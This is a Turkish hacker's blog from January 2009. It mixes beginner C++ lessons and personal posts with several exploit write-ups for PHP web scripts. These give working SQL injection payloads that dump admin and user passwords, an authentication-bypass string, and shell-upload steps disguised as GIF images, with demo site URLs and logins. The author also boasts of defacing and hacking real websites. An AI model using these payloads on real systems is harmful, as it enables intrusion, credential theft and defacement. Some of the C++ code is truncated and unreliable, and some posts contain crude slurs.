"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

30 Ocak 2009 Cuma

finaller bitti xD

çok şükür finaller bitti fakültede artık kaldı son bir yarım dönem sonrasında Allah kerimdir kpss vs a.q dert bitmiyorki xD

27 Ocak 2009 Salı

rustube hacked :)

link: http://rustube.org.ua/

zone 1: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8593698/

zone 2: http://turk-h.org/defacement/view/316166/rustube.org.ua/

21 Ocak 2009 Çarşamba

c++ for - while döngüsü


blogspotun a.q kodlar tam cıkmıyor dolayısıyla upload ediyorum kodları ;)



for (kosul)
{

olaylar burda

}

while (kosul)
{

olaylar burda

}

şeklinde kullanıyoruz.

misal:

bir sayı girmesini isteyelim kullanıcıdan

int x;

cout<<"bir sayı gir";

sorgu1;

cin>>a;

while ((x = 0) || (x < 0)){

cout<<"sayi ya sifira esit yada sifirdan kucuk";

goto sorgu1;

} //sayi 0 yada 0 dan küçük olması durumunda sorgu basa dönüyor eger doğruysa for döngüsüyle devam ediyor

for (x=1;x<101;x++)
{

cout<<"siralama:"<


gelelim kodladığım programa

kodları indir:

TIKLA iNDiR


link yenilendi uyarı için teşekkürler ;)

20 Ocak 2009 Salı

c++ basit hesap makinesi


c++ ile basit bir hesap makinesi kodladım sadece dört işlem yapıyor :D hadi hayırlı olsun.

kodları indir:

TIKLA iNDiR


programı indir:

TIKLA iNDiR

19 Ocak 2009 Pazartesi

c++ dosya yazdırma

yeni yazdığım bir program, sadece girdğiniz verileri zorlu.txt diye bir dosya acıyor ve kaydediyor. yanlız bir kac eksiği var tabiki misal klavyaden zorlu nasılsın girdiniz ? o zaman sadece zorlu kısmını alıyor. ama zorlunasılsın yazdığınız da kelimeyi full ekliyor yani sorun boşluk bırakınca sadece ilk kısmı alıyor :D ee daha yeniyim nede olsa böle aksaklıklar olcak illaki.

kaynak kodları indir:

TIKLA iNDiR


programı indir:

TIKLA iNDiR

18 Ocak 2009 Pazar

c++ ile kdv ve alış fiyatı belirleme programı


çalıştım çırpındım sonunda yaptım cok şükür sececeğiniz işleme göre ya kdv hesabı yapıyor yada kdv li bir malın alış fiyatını belirliyor. suan sadece %18 kdv ayarlamışım ilerleyen zamanlarda daha da geliştiririm elbette :D

kodlar eksik cıkabiiliyor dolayısıyla aynı zamanda upload yaptım da ;)

indir:

TIKLA iNDiR




#include 

#include

using namespace std;

int main(int argc, char *argv[])
{
int a;

cout<<"Kdv Hesabi icin 1'i secin Mal alis Fiyati Hesabi icin 2'yi Secin:";

cin>>a;

if (a == 1){

float fiyat;

cout<<"Fiyati Giriniz:";

cin>>fiyat;

int onsekiz=18;

int yuzde=100;

float kdv=(fiyat*onsekiz)/yuzde;

cout<<"Kdv:"<<" "<
float toplam=fiyat+kdv;

cout<<"Urun Satis Fiyati:"<<" "< }

else if (a == 2){

float fiyat2;

cout<<"Kdv"<<"'"<<"li Fiyati Giriniz:";

cin>>fiyat2; //üşenmek yokk :)

int yuzde2=100;

int yuzonsekiz2=118; //burdaki kdv yi % 18 olarak kabul ettik

float kdvsiz=(fiyat2*yuzde2)/yuzonsekiz2;

float kdvmiz=fiyat2-kdvsiz;

cout<<"Eklenen Kdv Tutari:"<
cout<<"Malin Gelis Fiyati:"< }

else{

cout<<"Neettin Gocum Ben 1 yada 2 Demisin senin Sectigine Bak :)) "< }

system("PAUSE");
return EXIT_SUCCESS;
}


ilk programım yaptım :)



ilk c++ programımı yaptım ama öle baskalarının programını editleyerek değil. sizde taktir edersiniz ki basit bir program oldu sadece toplama işlemi yapabiliyorsunuz sizin atadığınız değerleri topluyor. çok basit ama kafa yorarak verileri kendinize göre hazırlayarak yapınca pekte kolay olmuor :)

şimdi nasıl yaptığıma gelelim. simdi biz cin komutunu ne işe yaradığını biliyorduk tanımlanan karektere kullanıcı tarafından veri girilmesi imkanını veriyordu. kısaca hatırlayalım:

char a;


cout<<"veri gir";

cin>>a;

cout<<"vriniz:"<


şeklindeydi.

bende düşündüm char deilde karekterimizi int atasam da toplama yapsam nasıl olur? size de tavsiyem sizde düşünün önce kendiniz tasarlayın basarılı olamazsanız google a baş vurun

ve söyle yapmaya karar verdim:



int a;

cout<<"bir sayı giriniz:";

cin>>a;

int b;

cout<<"ikinci bir sayi giriniz:";

cin>>b;

cout<<"toplam:"<


yani kaynak kodlar:



#include
#include

using namespace std;

int main(int argc, char *argv[])
{

int a;

cout<<"bir sayi gir:";

cin>>a;

int b;

cout<<"ikinci bir sayi gir :";

cin>>b;

cout<<"toplam :"<

system("PAUSE");
return EXIT_SUCCESS;
}





ctrl+f9 sonrada ctrl+f10 yapıp çalıştırın

başarılı da oldum çok şükür :D

C++ Veriler



öncelikle bir proje acığıyoruz c++

biraz cout ve endl verisinden bahsedeceğim cout ile ekrana vurmak istediğimiz şeyi vurdururuz.

duygularımı tam ifade edemedim ama uygulamada anlarsınız :D endl ile de bir satır alta geçersiniz.

misal:

cout<<"bu ilk projem"<


yani kaynak kodlarımız:

#include 

#include

using namespace std;

int main(int argc, char *argv[])
{

cout<<"bu ilk projem"<
system("PAUSE");
return EXIT_SUCCESS;
}



ctrl+f9 yapıp derliyoruz ardından ctrl+f10 ile çalıştırıyoruz ;)


şimdide char ve cin verisinden kullanımından bahsedelim:

diyelim ki programınızı kullanan birinden veri girmesini isteyeceksiniz

o zaman bu veriler tam size göre. kullanımı:

char girdi;


cout<<"bir deger giriniz:";

cin>>girdi;

cout<<"girdiginiz deger:"<

kaynak kodlarımız:

#include 

#include

using namespace std;

int main(int argc, char *argv[])
{

char girdi;

cout<<"bir deger giriniz:";

cin>>girdi;

cout<<"girdiginiz deger:"<
system("PAUSE");
return EXIT_SUCCESS;
}



ctrl+f9 yapıp derliyoruz ardından ctrl+f10 ile çalıştırıyoruz ;)

17 Ocak 2009 Cumartesi

Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability

Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7811



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Merchandise/uploadimages/20090116084627c.php

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7810



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Personal/uploadimages/20090116083033c.php

Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability

Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7809



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/uploadimages/20090116070716c.php

13 Ocak 2009 Salı

nete mola :(

a.q bilmiyorum bu kaçıncı sırf kpss çalışabilmek için :( ne diyelim sistem utansın. kpss ye kadar ara ara girebilirim nete dolayısıyla bloğu pek güncelleyemiycem. açık falan da yok a.q :D neyse şimdilik eyvallah

8 Ocak 2009 Perşembe

Nette Napayım Diye Düşündüğüm Anlar :(

bazen nete girdiğimde napsam acaba dediğim anlar oluyor yani netin hiç bir anlam ifade etmediği anlar. öyle boş boş bakınıyorum. yani hack vs hiç hoş gelmiyor. belki bazen sizde de öyle olur. işte şuan öyle bir andayım a.q makü demek geliyor içimden :D ama biliyorum bu durum hep geçici keşke hakkaten böyle anlık olmasa her zaman olsada şu namussuz neti bırakabilsem fakat olmuyor :( Allah tan blog var yoksa a.q can sıkıntısından patlardım. neyse en iyisi fakülteye gideyim :D

6 Ocak 2009 Salı

RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability

RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7682



Discovered By: ZoRLu

for demo:

username: logoz ' or '

pass: dont write anything

http://www.riotpix.com/board/

C++ öğreniyorum :)

kafaya koydum a.q artık c++ öğrenecem. öğrendiklerii doğal olarak bloğumda da yayınlayacam. ilk dersten başlayalım. çok süper bir bilgim yok bu konuda yanlışlarım olursa kusura bakmayın:

printf();


kodu ekrana mesajı vurur.

kullanımı:

printf("Selam ZoRlu");


getch();


komutu programın klavyede bir tuşa basılarak sonlanmasını sağlar yanlız unutulmaması gereken bir şey var oda aşağıda ki komutla beraber kullanıldığıdır:

#include

5 Ocak 2009 Pazartesi

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7663



Discovered By: ZoRLu

you must login to site

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

4 Ocak 2009 Pazar

Gazze kan ağlıyor: 430 ölü


orrrospu çoçukları kırdı geçirdi okadar mazlumu :( bizim büyükler(!) sessiz kalsın bu işe, bir boykot bile yapılmasın israil piçine.

İsrail’in gece gerçekleştirdiği hava saldırısında yaralanan Hamas’ın askeri kanat liderlerinden biri öldü. Son saldırı ile birlikte Filistin’de ölenlerin sayısı 430’u buldu.

Önceki gece düzenlenen saldırıda yaralanan Hamas’ın askeri kanat liderlerinden Ebu Zekeriya El Cemal, sabaha karşı hayatını yaşamını yitirdi. Daha önceki bir saldırıda da siyasi liderlerden Nizar Rayan, ailesiyle birlikte ölmüştü.

Öte yandan, Gazze’de insani durum da gittikçe kötüleşiyor. Birleşmiş Milletler, Gazze’de ciddi sağlık sıkıntıları ve gıda krizi yaşandığı uyarısında bulundu.

Kayıplar artarken, taraflar arasında ateşkes sağlanması için çabalar da devam ediyor. Adının açıklanmasını istemeyen Filistinli bir yetkili, Mısır’ın yeni bir girişim başlattığını ve Hamas’la temasa geçtiğini söyledi.

Filistin Devlet Başkanı Mahmud Abbas da BM’de temaslarda bulunmak amacıyla New York’a gidiyor.

Abbas’la birlikte bazı Arap ülkelerinin Dışişleri Bakanları da New York’a giderek İsrail’in Gazze Şeridi’ndeki saldırılarına son vermesini sağlamak amacıyla temaslarda bulunacak.

kaynak: http://www.sosyalhaber.com/guncel/03-01-2009/gazze-kan-agliyor-430-olu.html

Blogspot için önemli uyarı

benim site dört ayı aşkın bir süredir açık fakat pagerank henüz 1 :( bir hata yaptım ve bunu nerde yaptığımı anladım ben kategori sistemini uygulamıstım aman ha sakın ola blogspotta kategori yapmayın :( pişman olursunuz, müşgüle düşersiniz, yerlimalı gibi kalırsınız :D etiket blogspot için çok önemli bende sonradan farkettim :( ama geç olsun güç olmasın sizede tavsiyem kategori yerine etiket bulutu oluşturun ;)

3 Ocak 2009 Cumartesi

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7645



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://demos.built2go.com/rate%20my%20photo/1/

login:

http://demos.built2go.com/rate%20my%20photo/1/member.php

user: salla

pass: salla1

shell:

http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php

Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability

Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7644



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://www.q-seek.com/

login:

http://www.q-seek.com/member.php

user: salla

pass: salla1

shell:

http://www.q-seek.com/pictures/14_2009-01-02-02-25-03.php

2 Ocak 2009 Cuma

İşte Kurtlar Vadisi'nin yeni kanalı

gelde mıçma xD bokunu çıkardılar a.q taaaa subatta baslıycakmış :S başlamasın daha iyi :(

Show TV ile anlaşmazlığa düşerek yeni bölümlerin yayınlanmasını durduran Kurtlar Vadisi Pusu, yeni bir kanalla anlaştı.

Postmedya adlı internet sitesinin haberine göre Kurtlar Vadisi'nin atv ile kesin olarak anlaştığı ve kanalın genel müdürü Fatih Edipoğlu'yla el sıkıştığı ortaya atıldı.

VE ANLAŞTILAR

Yeni bölümleri için diğer kanallarla uzun zamandır temasta olan dizinin yapımcıları Raci Şaşmaz ve Bahadır Özdener, sonunda atv ile anlaştı.

Böylece dizinin yeni bölümleri Şubat ayından itibaren atv ekranlarında olacak.

kaynak: http://msnyasam.milliyet.com.tr

hikayeler.net hacking video

hatırlıyorsanız bir kac gün önce hikayeler.net te acık bulup hacklediğimi söylemiştim. açık file upload açığı. kendilerinede özel mesajla açık olduğunu bildirmiştim. belli ki pekte umursamamışlar madem onlar umursamıyor ben hiç umursamam xD açık kapandımı bilmiyorum. daha sonra hiç kontrol etmedim.

işte video:

TIKLA iNDiR



parola:

z0rlu.blogspot.com

1 Ocak 2009 Perşembe

getaphpsite Cheats (id) R-Sql & B-Sql inj



getaphpsite Cheats (id) R-Sql & B-Sql inj

link: http://packetstormsecurity.org/0812-exploits/cheats-sql.txt

link: http://www.exploiter5.com/all.php?id=62

Exp 1: ( Remote )

http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[SQL] ( Reklam Kokusu AlIyorum : ) z0rlu.blogspot.com )

[SQL]=

0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--

exp 2: ( Blind )

http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[BLiND]

[id]+and+substring(@@version,1,1)=5 ( true )

[id]+and+substring(@@version,1,1)=4 ( false )


for demo: ( Remote )

http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--


for demo: ( Blind )

http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=5 ( true )

http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=4 ( false )

getaphpsite PHP Careers Search Remote File Upload

getaphpsite PHP Careers Search Remote File Upload

link: http://www.exploiter5.com/all.php?id=59

link: http://packetstormsecurity.org/0812-exploits/phpcareers-upload.txt

you go here : http://z0rlu.blogspot.com/script/employers/employer_registration.php

and register to site

after you click to gozat button and select your shell.php for register to site

after go here: http://z0rlu.blogspot.com/script/employers/employers/login.php

and login to site more after click to "Edit Info" ( you must look to left )

you must be here now: http://z0rlu.blogspot.com/script/employers/employers/EditInfo.php

and you right click to your logo select properties and copy logo link

go your shell:

http://z0rlu.blogspot.com/script/employers/employer_logos/[id]_offer_shell.php


exp for demo:

http://www.phpstore.info/demos/phpcareers/employers/login.php

user: zorlu

passwd: zorlu1

http://www.phpstore.info/demos/phpcareers/employers/EditInfo.php

and shell:

http://www.phpstore.info/demos/phpcareers/employers/employer_logos/1228994464_offer_c.php ( no permission for demo )

getaphpsite Top Sites (cat) Remote Sql inj



getaphpsite Top Sites (cat) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/topsites-sql.txt

link: http://www.exploiter5.com/all.php?id=60

Exploit:

http://z0rlu.blogspot.com/script/category.php?cat=[SQL1] or [SQL2]

[SQL1]=

3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin

[SQL2]=

3+union+select+1,concat(username,0x3a,password),3,4,5+from+users

for demo:

http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin

or

http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+users

getaphpsite e-store (where) Remote Sql inj


getaphpsite e-store (where) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/estore-sql.txt

link: http://www.exploiter5.com/all.php?id=61

Discovered By: ZoRLu

Exploit:

http://z0rlu.blogspot.com/script/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]

[SQL]=

ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc

for demo:

http://www.getaphpsite.com/demos/estore/SearchResults.php?SearchTerm=ZoRLu&where=ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc

getaphpsite Home Business Directory (cat_id) Remote Sql inj

getaphpsite Home Business Directory (cat_id) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/homebusiness-sql.txt

link: http://www.exploiter5.com/all.php?id=63

Discovered By: ZoRLu

Exploit:

http://z0rlu.blogspot.com/script/directory.php?ax=list&sub=ZoRLu&cat_id=[SQL]

[SQL]=

0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users

for demo:

http://www.getaphpsite.com/demos/homebiz/directory.php?ax=list&sub=ZoRLu&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users

2009 da ilk yazım :)

yeni bir yıl yeni bir başlangıç belkide. herkese huzur, mutluluk vs getirmesi temennimdir. yeni yılda yeni açıklarla inş kaldığımız yerden devam edecez. son olarak ne diyoruz 2009 için hepiy börd dey ( ingilizcenin amına koyduk :D )
 
Dizi